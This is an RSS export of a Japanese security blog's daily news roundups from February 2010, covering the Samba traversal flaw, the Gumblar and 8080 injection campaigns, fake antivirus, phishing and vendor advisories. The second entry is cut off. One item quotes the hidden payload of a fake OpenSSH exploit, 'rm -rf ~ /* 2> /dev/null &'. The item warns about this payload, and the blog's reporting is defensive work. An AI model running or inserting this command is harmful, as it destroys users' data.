<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
		xmlns:xhtml="http://www.w3.org/1999/xhtml"
>

<channel>
	<title>UnderForge of Lack</title>
	<atom:link href="http://www3.atword.jp/gnome/feed/" rel="self" type="application/rss+xml" />
	<link>http://www3.atword.jp/gnome</link>
	<description>R.I.P Security, just prevent everything</description>
	<pubDate>Tue, 09 Feb 2010 13:43:15 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
			<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/feed/" />
		<item>
		<title>2010.02.09 火曜日</title>
		<link>http://www3.atword.jp/gnome/2010/02/09/feb-09-2010-tue/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/09/feb-09-2010-tue/#comments</comments>
		<pubDate>Tue, 09 Feb 2010 00:11:05 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[Bleeping Computer]]></category>

		<category><![CDATA[cNotes]]></category>

		<category><![CDATA[F-Secure]]></category>

		<category><![CDATA[FakeAV]]></category>

		<category><![CDATA[FUD]]></category>

		<category><![CDATA[Gumblar]]></category>

		<category><![CDATA[gumblar.cn]]></category>

		<category><![CDATA[heise]]></category>

		<category><![CDATA[IBM XForce]]></category>

		<category><![CDATA[Mcafee]]></category>

		<category><![CDATA[msmvps]]></category>

		<category><![CDATA[noooo_spam]]></category>

		<category><![CDATA[OpenSSH]]></category>

		<category><![CDATA[Oracle]]></category>

		<category><![CDATA[Panda]]></category>

		<category><![CDATA[Samba]]></category>

		<category><![CDATA[SANS]]></category>

		<category><![CDATA[Secunia]]></category>

		<category><![CDATA[SmileBanana]]></category>

		<category><![CDATA[so-net]]></category>

		<category><![CDATA[Sophos]]></category>

		<category><![CDATA[Sunbelt]]></category>

		<category><![CDATA[tata]]></category>

		<category><![CDATA[TrendMicro]]></category>

		<category><![CDATA[Websense]]></category>

		<category><![CDATA[WoW]]></category>

		<category><![CDATA[新規タグの追加]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7442</guid>
		<description><![CDATA[

ふくの日
下関では、河豚は「ふく」と発音する。
漫画の日
漫画家・手塚治虫氏の命日に因み漫画本専門古書店「まんだらけ(2652)」が制定。
風の日 (風がふく[29])
服の日 [29]
福の日 [29]
肉の日 （ [...]]]></description>
			<content:encoded><![CDATA[<p>
<div class="div10refer"></div>
<a href="http://ja.wikipedia.org/wiki/%E3%83%95%E3%82%B0"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />ふく</a>の日<br />
<div class="div10refer"><a href="http://ja.wikipedia.org/wiki/%E4%B8%8B%E9%96%A2%E5%B8%82"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />下関</a>では、河豚は「ふく」と発音する。</div>
<a href="http://ja.wikipedia.org/wiki/%E6%BC%AB%E7%94%BB"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />漫画</a>の日<br />
<div class="div10refer"><a href="http://ja.wikipedia.org/wiki/%E6%BC%AB%E7%94%BB%E5%AE%B6"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />漫画家</a>・<a href="http://ja.wikipedia.org/wiki/%E6%89%8B%E5%A1%9A%E6%B2%BB%E8%99%AB">手塚治虫</a>氏の命日に因み漫画本専門<a href="http://ja.wikipedia.org/wiki/%E5%8F%A4%E6%9B%B8%E5%BA%97"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />古書店</a>「<a href="http://ja.wikipedia.org/wiki/%E3%81%BE%E3%82%93%E3%81%A0%E3%82%89%E3%81%91"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />まんだらけ</a>(<a href="http://company.nikkei.co.jp/index.aspx?scode=2652&amp;ba=1"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_nikkeij.gif" class="cIcon" alt="" />2652</a>)」が制定。</div>
<a href="http://ja.wikipedia.org/wiki/%E9%A2%A8"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />風</a>の日 (風がふく[29])<br />
<a href="http://ja.wikipedia.org/wiki/%E8%A1%A3%E9%A1%9E"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />服</a>の日 [29]<br />
<a href="http://ja.wikipedia.org/wiki/%E7%A6%8F"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />福</a>の日 [29]<br />
<a href="http://ja.wikipedia.org/wiki/%E8%82%89"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />肉</a>の日 （特売！<span class="cHide">それは毎月29日！</span>）<br />
<a href="http://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E8%88%AA%E7%A9%BA350%E4%BE%BF%E5%A2%9C%E8%90%BD%E4%BA%8B%E6%95%85"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />日本航空350便墜落事故</a> 1982年 a.k.a <a href="http://ja.wikipedia.org/wiki/%E9%80%86%E5%99%B4%E5%B0%84"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />逆噴射</a>事故<br />
<a href="http://ja.wikipedia.org/wiki/%E3%81%88%E3%81%B2%E3%82%81%E4%B8%B8%E4%BA%8B%E4%BB%B6"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />えひめ丸事件</a><br />
<br />
----------<br />
<br />
細かいのがいっぱい・・・<br />
<br />
----------<br />
<strong>Samba</strong><br />
<a href="http://www.h-online.com/security/news/item/Vulnerability-in-Samba-provides-access-to-files-924425.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Vulnerability in Samba provides access to files </a><br />
<span class="cRefer">Attackers can even get access to the system's root directory (/). To exploit the flaw (directory traversing), attackers first have to have an account on the Samba server that includes write access to at least one share.</span><br />
典型的な<a href="http://ja.wikipedia.org/wiki/%E3%83%87%E3%82%A3%E3%83%AC%E3%82%AF%E3%83%88%E3%83%AA%E3%83%88%E3%83%A9%E3%83%90%E3%83%BC%E3%82%B5%E3%83%AB"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />ディレクトリ・トラバーサル</a>ですね<br />
もっとも、アクセス可能な実アカウントか、ゲストに対しても書き込み可能な共有領域（！）が必要の様子。<br />
<a href="http://www.youtube.com/watch?v=NN50RtZ2N74"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_youtube.gif" class="cIcon" alt="" />Samba Remote Exploit // by Kingcope in 2010</a><br />
長いし、要領得ないし、何より音楽が変・・・<br />
<span class="cRefer">I added some nice greek tune so turn your speakers on (or off).</span> OFF 推奨（笑）<br />
<br />
<a href="http://www.samba.org/samba/news/symlink_attack.html"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_samba.gif" class="cIcon" alt="" />Claimed Zero Day exploit in Samba</a><br />
<span class="cAttention">Quick FAQ: What do I do !</span><br />
<span class="cRefer">Set:<br />
  <span class="cSafe">wide links = no</span><br />
in the [global] section of your smb.conf and restart smbd to eliminate this problem.</span><br />
<br />
----------<br />
<strong>Gumblar(本物)</strong><br />
<a href="http://securitylabs.websense.com/content/Alerts/3548.aspx"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_websense.gif" class="cIcon" alt="" />Bollywood Hungama Web Site Compromised</a><br />
どっかで見たことのあるスクリプトですよね？<br />
<br />
感染サイトを見つけて、いろいろwgetを試みたのですが、上流が停止しているのか、IPがブロックされているのか、何も降ってきませんね～　ScanSafeも、Kasperskyも沈黙しているので詳しい情報もあまり入ってきませんし、MDLのフォーラムでもイマイチな反応です。<br />
<br />
<a href="http://blogs.yahoo.co.jp/noooo_spam/59503402.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_yahoo.gif" class="cIcon" alt="" />2010年2月 「Gumblar.x」の改ざん攻撃再開 ・ 続報 -- 無題なブログ</a><br />
<span class="cRefer">今現在、日本の陥落サイト４０ヶ所をチェッカーで監視してます。</span><br />
nooo_spam様の監視体制はすごいなぁ<br />
うちにあった陥落リスト１０個は全部クリーンアップされていました。<br />
<br />
※いつものことですが、スクリプトやペイロードはコロコロ変わるので、脆弱性の穴をふさいでおくことが基本対策です。<br />
<br />
----------<br />
<strong>8080</strong><br />
<a href="http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=%A5%A4%A5%F3%A5%B8%A5%A7%A5%AF%A5%B7%A5%E7%A5%F3+8080%A4%CE%A5%A2%A5%AF%A5%BB%A5%B9%C0%A9%B8%E6%A1%A9"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_cnotes.gif" class="cIcon" alt="" />インジェクション 8080のアクセス制御？</a><br />
<span class="cRefer">同一IPアドレスで数日後にアクセスしないとコンテンツ（＝検体）がダウンロードできない </span><br />
こっちも、ケチケチ作戦（仮称：なかなか検体をくれない）の余波でちっとも解析できないようです・・・<br />
<br />
「一見さん」のみが感染するというのが、最近の拡散のトレンドなのでしょうか？（苦笑）<br />
<br />
----------<br />
<strong>Tata down</strong><br />
タタといえば、あの<a href="http://ja.wikipedia.org/wiki/%E3%82%BF%E3%82%BF%E3%83%BB%E3%83%A2%E3%83%BC%E3%82%BF%E3%83%BC%E3%82%BA"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />タタ・モーターズ</a>を含めたインド屈指の財閥ですが、「インドへのIT外注」の先駆の一つともいえる<a href="http://ja.wikipedia.org/wiki/%E3%82%BF%E3%82%BF%E3%83%BB%E3%82%B3%E3%83%B3%E3%82%B5%E3%83%AB%E3%82%BF%E3%83%B3%E3%82%B7%E3%83%BC%E3%83%BB%E3%82%B5%E3%83%BC%E3%83%93%E3%82%B7%E3%82%BA"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />タタ・コンサルタンシー・サービシズ</a>のウェブサイトが・・<br />
<a href="http://www.theregister.co.uk/2010/02/08/tcs_redirect/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />Cheeky French hackers hijack Tata website</a><br />
<br />
また<a href="http://en.wikipedia.org/wiki/DNS_hijacking"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />このテ</a>ですか・・<br />
しかし、「French hacker」と断じるにはちょっと情報不足な気もしますネ<br />
<br />
----------<br />
<strong>中国がんばってます</strong><br />
Operation Auroraで、中国の話が盛り上がったわけですが、その後の経緯とかは政治色に糊塗されてしまった感があり、生煮え終了な感じがしなくもないわけですが・・<br />
中国そのものは<a href="http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=CNNIC%A4%CB%A4%E8%A4%EB%2Ecn%A5%C9%A5%E1%A5%A4%A5%F3%C5%D0%CF%BF%BF%B3%BA%BA%A4%CE%B8%AB%C4%BE%A4%B7"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_cnotes.gif" class="cIcon" alt="" />CNNICの審査強化</a>やらで結構がんばっている印象です。<br />
<a href="http://www.h-online.com/security/news/item/China-shuts-down-cracker-website-924733.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />China shuts down cracker website </a><br />
<span class="cRefer">"Black Hawk Safety Net" site have been arrested.</span><br />
こないだの<a href="http://pandalabs.pandasecurity.com/ms10-002-exploit-constructor/"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_pandasecurity.gif" class="cIcon" alt="" />暗黒工作組</a>よりはセンスあるかもネ・・<br />
<br />
<span class="cRefer">A 20-year old student told China Daily, "Basically students were told how to steal accounts and use trojan programs.</span><br />
いやな日常会話だなぁ・・"<br />
<br />
----------<br />
<strong>Think B4 U post!</strong><br />
<a href="http://sunbeltblog.blogspot.com/2010/02/sunbelt-supports-safer-internet-day.html"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_sunbelt.gif" class="cIcon" alt="" />Sunbelt supports Safer Internet Day: Think B4 U post! </a><br />
<span class="cRefer">For example, photos, <u>once posted online, remain online and can be seen by anybody, even years after they have been posted</u>. Therefore, children and teenagers need guidance to manage their online identity in a responsible way, to be in control of their own online identity.</span><br />
この標語はいいですね。<br />
特に未成年の場合、自分の写真などを安易に公開することの危険性を認識するための教育（ないしはそのプロセス）は極めて重要です。<br />
<br />
日本だとどこのセクションが担当するんでしょうね、コレ？<br />
<a href="http://ja.wikipedia.org/wiki/%E7%A6%8F%E5%B3%B6%E7%91%9E%E7%A9%82"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />この人</a>？<br />
<br />
----------<br />
<strong>釣りセミナー</strong><br />
<a href="http://www.antiphishing.jp/information/information1044.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_antiphishing_jp.gif" class="cIcon" alt="" />◆◆フィッシング対策セミナー資料公開のお知らせ◆◆</a><br />
日本国内における、フィッシング対策のセミナーの資料が公開されました。<br />
（<span class="cCom">※ただしPDF</span>）<br />
<br />
----------<br />
<strong>PPDF</strong><br />
<a href="http://www.f-secure.com/weblog/archives/00001878.html"><img src="http://www3.atword.jp/gnome/files/2009/09/ic_f-secure2.gif" class="cIcon" alt="" />Watch out for flower-show.org</a><br />
まだやってた(<a href="http://www3.atword.jp/gnome/2010/01/08/jan-08-2010-fri/"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_myu_atword.gif" class="cIcon" alt="" />2010.01.08 金曜日</a>)のか！？<br />
<br />
Adobe Readerのゼロデイは既に塞がれて居ますので、最新版にアップデートしてください。<br />
<br />
----------<br />
<strong>XP Internet Security, Vista and 7</strong><br />
<a href="http://www.sophos.com/blogs/sophoslabs/v/post/8564"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sophos.gif" class="cIcon" alt="" />FakeAV Uses False “Microsoft Security Updates”</a><br />
<span class="cRefer">Troj/FakeAv-AUF poses as the Windows Automatic Update facility and purports to install an update named XP Internet Security.</span><br />
ふーん、XPだけか～<br />
<br />
ご心配なく（！？）、ちゃんと、XP以外のものもあります<br />
<a href="http://www.bleepingcomputer.com/virus-removal/remove-antivirus-vista-2010"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_bleepingcomputer.gif" class="cIcon" alt="" />How to remove XP Internet Security 2010(以下略）</a><br />
<div class="div10refer">Antivirus Vista 2010<br />
Vista Antispyware 2010<br />
Vista Guardian<br />
Vista Antivirus Pro<br />
Vista Internet Security<br />
Vista Internet Security 2010<br />
XP Guardian<br />
XP Antivirus Pro<br />
XP AntiSpyware 2010<br />
XP Internet Security<br />
XP Internet Security 2010<br />
Antivirus XP 2010<br />
Antivirus Win 7 2010<br />
Win7 Guardian<br />
Win 7 Antivirus Pro<br />
Win 7 Antispyware 2010<br />
Win 7 Internet Security<br />
Win 7 Internet Security 2010<br />
</div>
いや・・・無くていいんですが・・・<br />
<br />
----------<br />
時間切れ気味なので、快速(Rapidly)～<br />
<br />
----------<br />
<strong>またカード窃取？</strong><br />
<a href="http://www.so-net.ne.jp/security/news/view.cgi?type=2&amp;no=2146"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_so-net.gif" class="cIcon" alt="" />モンベルウェブサイト、不正アクセス受けカード情報盗難か</a><br />
<br />
<span class="cLess">ttp://www.montbell.jp/</span><br />
また一枚絵・・・<br />
<span class="cRefer">状況が確定していない中での速報情報となりますが、2009年11月以降にモンベル・オンラインショップをご利用いただいたお客様について、クレジットカード情報が窃取された可能性があり</span><br />
期間長いですね<br />
<span class="cHide">SQLインジェクションかな？</span><br />
<br />
<a href="http://www.yomiuri.co.jp/net/security/s-news/20100208-OYT8T00224.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_yomiuri.gif" class="cIcon" alt="" />「モンベル」サイト、不正アクセス被害…カード情報盗難？</a><br />
<br />
----------<br />
<strong>WoW</strong><br />
WoWってそんなに流行ってるんですか？<br />
<a href="http://blog.f-secure.jp/archives/50347159.html"><img src="http://www3.atword.jp/gnome/files/2009/09/ic_f-secure2.gif" class="cIcon" alt="" />world<span class="cBurn">r</span>ofwarcraft.com</a><br />
<span class="cRefer"> 　「World of Warcraft」オンラインゲームは、世界に1000万人以上のプレイヤーを擁している。<br />
「World of Warcraft」には、これを標的とし、エンドユーザのログイン情報を盗もうとする、何百ものフィッシングWebサイトもある。</span><br />
<br />
----------<br />
<strong>BlackHat 2010 DC+ by IBM XForce</strong><br />
<a href="http://blogs.iss.net/archive/bhdc2010.html"><img src="http://www3.atword.jp/gnome/files/2009/03/ico_ibm.gif" class="cIcon" alt="" />My Blackhat DC Paper, Slides, and Video are available</a><br />
<a href="http://www.blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Cross"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_blackhat2.gif" class="cIcon" alt="" />Exploiting Lawful Intercept to Wiretap the Internet</a><br />
<br />
----------<br />
<strong>ネカフェチェッカー</strong><br />
<a href="http://blogs.technet.com/mmpc/archive/2010/02/07/are-you-from-an-internet-cafe.aspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_msdn.gif" class="cIcon" alt="" />Are you from an Internet cafe?</a><br />
<span class="cRefer">These processes are related to popular administration software used in Internet cafés in China.  If any of these processes are found, obviously, the affected system is most likely from an Internet café.</span><br />
怖い怖い・・・<br />
一昔前の韓国(aka <a href="http://ja.wikipedia.org/wiki/%E3%82%A4%E3%83%B3%E3%82%BF%E3%83%BC%E3%83%8D%E3%83%83%E3%83%88%E3%82%AB%E3%83%95%E3%82%A7"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />PC房</a>)の混乱みたいな感じなのでしょうかね？<br />
<a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader:Win32/Chekafe.A"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />TrojanDownloader:Win32/Chekafe.A</a><br />
<br />
----------<br />
<strong>ZeuS キャンペーン続報</strong><br />
<a href="http://securitylabs.websense.com/content/Alerts/3546.aspx"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_websense.gif" class="cIcon" alt="" />Zeus Campaign Targeted Government Departments </a><br />
本気でサイバー戦争仕掛ける気なのかしらん？<br />
<br />
関連？：<br />
<a href="http://pandalabs.pandasecurity.com/distributing-malware-through-facebook/"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_pandasecurity.gif" class="cIcon" alt="" />Distributing malware through Facebook</a><br />
あいかわらず・・<br />
<br />
----------<br />
<strong>ケス・デバーニュ</strong><br />
どっちかっていうと<a href="http://ja.wikipedia.org/wiki/%E3%82%B1%E3%82%B9%E3%83%BB%E3%83%87%E3%83%91%E3%83%BC%E3%83%8B%E3%83%A5"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />自転車の印象</a>しか無かった、<a href="http://ja.wikipedia.org/wiki/%E3%82%B1%E3%82%B9%E3%83%BB%E3%83%87%E3%83%91%E3%83%BC%E3%83%8B%E3%83%A5%E3%82%B0%E3%83%AB%E3%83%BC%E3%83%97"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />Caisse d'Epargne</a>(仏)ですが、釣りには気をつけましょう～ということで<br />
<a href="http://blog.trendmicro.com/caisse-d%E2%80%99epargne-customers-beware/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_trendmicro.gif" class="cIcon" alt="" />Caisse d’Epargne Customers, Beware!</a><br />
<br />
類似：<br />
<a href="http://blog.trendmicro.com/phishing-pages-pose-as-secure-login-pages/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_trendmicro.gif" class="cIcon" alt="" />Phishing Pages Pose as Secure Login Pages</a><br />
<span class="cRefer">Next, a secure login page always has a padlock icon on the lower-right portion of the page while the fake page only has an exclamation point, indicating that something is wrong.</span><br />
重要な情報を入力する際には、指呼確認が必要です（笑）<br />
<br />
----------<br />
<strong>消してない</strong><br />
<a href="https://msmvps.com/blogs/spywaresucks/archive/2010/02/08/1755867.aspx"><img src="http://www3.atword.jp/gnome/files/2010/02/ic_spywaresucks.gif" class="cIcon" alt="" />Google Chrome leaves old versions behind when updated? </a><br />
<span class="cAttention">Can the folder 3.0.195.38 be deleted safely?</span><br />
たぶん・・<br />
<span class="cRefer">[comment]No, it does not pose a security threat (the .dlls have been unregistered)</span><br />
<br />
----------<br />
<strong>by Secunia</strong><br />
<br />
<a href="http://secunia.com/advisories/38486/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />httpdx "f_command()" FTP Command Format String Vulnerability</a> <span class="cDanger">4</span><br />
<span class="cBurn">[UNpatched]</span><br />
<span class="cRefer">Use in trusted networks only. Block access to the FTP service.</span><br />
via : <a href="http://www.exploit-db.com/exploits/11343"><img src="http://www3.atword.jp/gnome/files/2009/11/ic_exploit-dbgif.gif" class="cIcon" alt="" />httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash) </a><br />
<br />
<a href="http://secunia.com/advisories/38488/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />odlican.net CMS Arbitrary File Upload Security Issue</a> <span class="cDanger">4</span><br />
<span class="cBurn">[UNpatched]</span><br />
<span class="cRefer">Restrict access to the upload.php script (e.g. via .htaccess).</span><br />
<br />
<a href="http://secunia.com/advisories/38473/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />Oracle WebLogic Server Node Manager Unspecified Vulnerability</a> <span class="cAttention">3</span><br />
<a href="https://support.oracle.com/CSP/main/article?cmd=show&amp;type=NOT&amp;id=1058764.1"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_oracle.gif" class="cIcon" alt="" />Apply the patches.</a><br />
※昨日のパッチです。　Oracleは素早い！<br />
<br />
----------<br />
<strong>海賊版</strong><br />
<a href="http://www.so-net.ne.jp/security/news/view.cgi?type=2&amp;no=2147"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_so-net.gif" class="cIcon" alt="" />ビジネスソフトや海外ドラマの海賊版販売、青森県十和田市の男を逮捕</a><br />
このテも減りませんね・・<br />
<br />
----------<br />
<strong>ちゃんとノミネートするように！</strong><br />
<a href="http://www.avertlabs.com/research/blog/index.php/2010/02/08/dave-marcus-is-ready-for-his-oscar/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_mcafee.gif" class="cIcon" alt="" />Dave Marcus is ready for his Oscar</a><br />
（笑）<br />
<br />
----------<br />
<strong>Open SSH!?</strong><br />
（気分的に）イヤだった SFTP(SSH-L2)への移行を進めている最中なのに<br />
<a href="http://isc.sans.org/diary.html?storyid=8185"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />When is a 0day not a 0day? Fake OpenSSh exploit, again. </a><br />
え”～～！？<br />
と思ったら・・・<br />
<br />
<span class="cBurn">"rm -rf ~ /* 2&gt; /dev/null &amp;"</span><br />
おいおいおい・・<br />
こんなもん実行できるわけないでしょうに（汗） <br />
<span class="cCom">いや、rootアクセスを許してればっ・・ってそれじゃ権限昇格じゃないしっ！（苦笑）</span><br />
<br />
<span class="cRefer">Lesson four, just because something is posted online does not mean anyone has actually checked the facts or performed QA on the code.</span><br />
こうして PoC が FUD として蔓延していくのですね～<br />
<span class="cRefer">Do the research and analysis before crying wolf.</span><br />
怖い怖い<br />
<br />
※OpenSSHに、「確認されている0-day exploits」は現時点では無いと思われます。<br />
<span class="cHide">と書いておかないとまた問題になりそうだ・・</span><br />
<br />
----------<br />
<strong>不思議だっ！</strong><br />
<br />
<a href="http://www.smilebanana.com/archives/2010/02/08-2157.php"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_smilebanana.gif" class="cIcon" alt="" />レンキン教授と不思議な卵</a><br />
<br />
<span class="cHide">４つ割れてる気もしないでもないけど、減ったのは６個、使ったのは３個<br />
6-3=4!?<br />
<br />
最近作った失敗作：<br />
固形化したメレンゲ（orz）</span><br />
<br />
----------<br />
<strong>8080</strong><br />
<span class="cAttention">78.41.156.236</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:6908"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS6908</a>(DATAHOP) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">89.105.199.130</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24875"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24875</a>(NL-ISPSERVICES) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-netherlands.jpg" class="cFlag" alt="" title="オランダ" /><br />
<span class="cAttention">91.121.96.181</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<span class="cAttention">91.121.112.227</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<span class="cAttention">94.23.199.154</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<br />
今日は（チェックしているところは）全部同じラウンドロビンに収束。<br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265659225 | B    | [goog-black-hash 1.50610 update]<br />
| 1265659202 | M    | [goog-malware-hash 1.19228 update]<br />
|   321177 | -814(321991) 微減<br />
|  1347320 | <br />
<br />
----------<br />
<strong>明日はマイクロソフトの（パッチの）日</strong><br />
<br />
EoF</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/09/feb-09-2010-tue/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/09/feb-09-2010-tue/" />
	</item>
		<item>
		<title>2010.02.08 月曜日</title>
		<link>http://www3.atword.jp/gnome/2010/02/08/feb-08-2010mon/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/08/feb-08-2010mon/#comments</comments>
		<pubDate>Sun, 07 Feb 2010 23:18:39 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[blackberry]]></category>

		<category><![CDATA[CSO]]></category>

		<category><![CDATA[DNS-BH]]></category>

		<category><![CDATA[heise]]></category>

		<category><![CDATA[Mandiant]]></category>

		<category><![CDATA[Mtrends]]></category>

		<category><![CDATA[mycom]]></category>

		<category><![CDATA[Oracle]]></category>

		<category><![CDATA[SANS]]></category>

		<category><![CDATA[skype]]></category>

		<category><![CDATA[Sunbelt]]></category>

		<category><![CDATA[ThreatPost]]></category>

		<category><![CDATA[USCERT]]></category>

		<category><![CDATA[vimeo]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7430</guid>
		<description><![CDATA[
 
郵便マークの日
この経緯に関しては、諸説あることで知られている。
「T」を第一案とし、「テイシンショウ」の片仮名の「テ」を図案化した「〒」を第二案として提出したところ、第二案の「〒」が採用された。しかし、告示の時「 [...]]]></description>
			<content:encoded><![CDATA[<p>
 <div class="div10refer"></div>
<a href="http://ja.wikipedia.org/wiki/%E9%83%B5%E4%BE%BF%E3%83%9E%E3%83%BC%E3%82%AF%E3%81%AE%E6%97%A5"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />郵便マークの日</a><br />
<div class="div10refer">この経緯に関しては、諸説あることで知られている。<br />
<div class="div10refer">「T」を第一案とし、「<a href="http://ja.wikipedia.org/wiki/%E9%80%93%E4%BF%A1%E7%9C%81"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />テイシンショウ</a>」の片仮名の「テ」を図案化した「<a href="http://ja.wikipedia.org/wiki/%E3%80%92"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />〒</a>」を第二案として提出したところ、第二案の「〒」が採用された。しかし、告示の時「T」と誤ってしまったために、これを訂正した、という説。<br />
「T」にすることで最初から決まっていたものの、後日調べてみると「T」は国際郵便の取扱いでは、郵便料金不足の印として万国共通に使用されていた。そのため、これによく似たマークは適当ではないということで、「〒」に訂正した、という説。また、この訂正では、「テイシンショウ」の片仮名の「テ」からの説と、単純に「T」の上に一本足して「〒」とした、という説の2つがある。</div></div>
